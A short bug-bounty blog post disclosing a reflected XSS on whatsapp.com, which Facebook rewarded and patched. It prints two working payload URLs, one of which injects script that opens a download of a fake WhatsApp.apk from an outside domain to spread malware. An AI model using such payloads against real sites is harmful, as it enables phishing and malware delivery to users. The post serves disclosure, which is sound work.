WhatsApp : XSS vulnerability can be misused for Spreading Malware ~ Web Security Log

Sunday, 6 November 2016

WhatsApp XSS vulnerability can be misused for Spreading Malware

Little Insight:

[ According to FACEBOOK, This XSS could take advantage of the known domain to make phishing attacks easier or can be misused for Spreading Malware ]

Reward For Whatsapp XSS Vulnerability : 1000$

My Finding....

Domain: https://www.whatsapp.com

Poc url :

https://www.whatsapp.com/index.php/"><script>alert(document.domain)</script>

but you can think a little different

https://www.whatsapp.com/index.php/"><script>window.open("http://websecuritylog.com/whatsapp.apk")</script>

How this can be used to trick users to download a fake application (Malware - WhatsApp.apk) from other domain and easily can spreading malware..

More Information

The vulnerability mentioned here has been confirmed patched by the Facebook Security Team.

Web Security Log

Sunday, 6 November 2016

WhatsApp : XSS vulnerability can be misused for Spreading Malware

WhatsApp XSS vulnerability can be misused for Spreading Malware

Little Insight:

More Information

About Me

Blog Archive

Popular Posts

Jon Us On Facebook

Follow Me On Facebook

Google+ Followers

Follow by Email